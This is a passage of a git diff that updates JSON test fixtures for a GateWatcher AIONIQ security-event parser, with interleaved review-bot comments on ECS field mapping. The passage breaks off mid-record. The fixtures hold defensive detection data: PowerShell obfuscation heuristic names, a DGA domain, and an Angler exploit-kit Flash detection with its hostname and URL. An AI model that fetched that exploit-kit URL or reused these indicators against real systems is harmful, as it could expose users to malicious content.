--- GateWatcher/aioniq/tests/codebreaker.json | 48 ++++++++- GateWatcher/aioniq/tests/dga.json | 43 +++++++- GateWatcher/aioniq/tests/malcore.json | 99 ++++++++++++++++- GateWatcher/aioniq/tests/retrohunt.json | 96 ++++++++++++++++- GateWatcher/aioniq/tests/sigflow-alert.json | 77 ++++++++++++- GateWatcher/aioniq/tests/sigflow-file.json | 88 ++++++++++++++- GateWatcher/aioniq/tests/sigflow-meta.json | 78 +++++++++++++- .../aioniq/tests/suricata_alert_event.json | 101 ------------------ .../aioniq/tests/suricata_fileinfo_event.json | 98 ----------------- .../aioniq/tests/suricata_http_event.json | 88 --------------- 10 files changed, 522 insertions(+), 294 deletions(-) delete mode 100644 GateWatcher/aioniq/tests/suricata_alert_event.json delete mode 100644 GateWatcher/aioniq/tests/suricata_fileinfo_event.json delete mode 100644 GateWatcher/aioniq/tests/suricata_http_event.json
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index 606433e7e..5fdb0ae34
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -9,6 +9,52 @@ "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" }, "expected": { - "message": 
"{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" + "message": 
"{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", + "event": { + "category": [ + "network" + ], + "module": "powershell", + "severity": 1 + }, + "@timestamp": "2023-03-22T10:32:50.269000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 35444 + }, + "gatewatcher": { + "event_type": "powershell", + "flow_id": "2157601933358692", + "gcap": "gcap-xxxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxxxx.domain.local", + "sample_id": "03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local", + "scores": { + "analysis": 1890, + "analysis_detailed": "{\"AddContent\": 0, \"Base64\": 1520, \"CharInt\": 0, \"FmtStr\": 0, \"GetContent\": 0, \"InvokeExpression\": 0, \"InvokeRestMethod\": 0, \"InvokeWebRequest\": 0, \"SetContent\": 0, \"StartBitsTransfer\": 0, \"StrCat\": 370, \"StrJoin\": 0, \"StrReplace\": 0, 
\"StreamReader\": 0, \"StreamWriter\": 0, \"SystemIOFile\": 0, \"WebClientInvokation\": 0}", + "proba_obfuscated": 1.0 + }, + "state": "Exploit", + "sub_type": "powershell", + "timestamp_analyzed": "2023-03-22T10:32:50.269Z", + "timestamp_detected": "2023-03-22T10:30:37.145Z", + "type": "codebreaker" + }, + "observer": { + "name": "gcap-xxxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "ip": [ + "1.1.1.1", + "2.2.2.2" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "port": 4242 + } } } \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index 5303e1bb5..9f740f113 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json 
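Review bot: The new `codebreaker.json` expectation pins `gatewatcher.scores.analysis_detailed` as a JSON document serialised inside a string (`"{\"AddContent\": 0, ...}"`), i.e. double-encoded; if that is deliberate because the field is mapped as a keyword, say so in the parser, otherwise keep it structured so per-heuristic scores such as `Base64` and `StrCat` stay queryable. `event.category` is `["network"]` with no `event.type`, while `malcore.json` in the same commit sets `event.type: ["info"]`; ECS expects `type` next to `category`, and for a detection carrying `state: "Exploit"` and a `severity` an `event.kind: "alert"` is also absent, which is what most rule scoping keys on. Both are parser behaviour rather than fixture mistakes, but these expectations freeze them, so they are worth settling before the fixtures ossify; `flow_id` kept as a string and the ports normalised to numbers look right.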
@@ -9,6 +9,47 @@ "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}" }, "expected": { - "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}" + "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}", + "event": { + "category": [ + "network" + ], + "module": "dga", + "severity": 1 + }, + 
"@timestamp": "2023-03-22T10:46:08.487000Z", + "destination": { + "address": "2.2.2.2", + "ip": "2.2.2.2", + "port": 53 + }, + "gatewatcher": { + "domain_name": "pgoadcmgqfacj.com", + "event_type": "dga", + "flow_id": "729468278572", + "gcap": "gcap-xxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxx.domain.local", + "matched_event": "041b2ed4-a5e0-4814-8bdc-7522b6d5464f", + "probability": 0.9999731546766107, + "timestamp_analyzed": "2023-03-22T10:46:08.487Z", + "timestamp_detected": "2023-03-22T10:25:54.903Z", + "type": "machine_learning" + }, + "observer": { + "name": "gcap-xxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "ip": [ + "1.1.1.1", + "2.2.2.2" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "port": 1294 + } } } \ No newline at end of file diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index 7a6dc8130..9c3c5ea11 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json 
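Review bot: The `dga.json` expectation keeps the detected domain (`pgoadcmgqfacj.com`) only under the vendor key `gatewatcher.domain_name`; since this is a DNS detection (`dest_port: 53`, `type: machine_learning`) the name belongs in `dns.question.name` and `related.hosts` too, otherwise the one indicator an analyst pivots on is invisible to ECS-based rules. As in `codebreaker.json`, `event.category: ["network"]` comes with neither `event.type` nor `event.kind: "alert"`; `type: ["info"]` would at least match `malcore.json` from the same commit. `flow_id` arrives as a JSON number (`729468278572`) and is pinned as the string `"729468278572"`, which is the right call for an identifier that can exceed 2^53 and is consistent with the CrowdStrike `context.pid` change earlier in this series.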
@@ -9,6 +9,103 @@ "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; 
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_deta
ils\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}" }, "expected": { - "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 
14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}" + "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 
14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e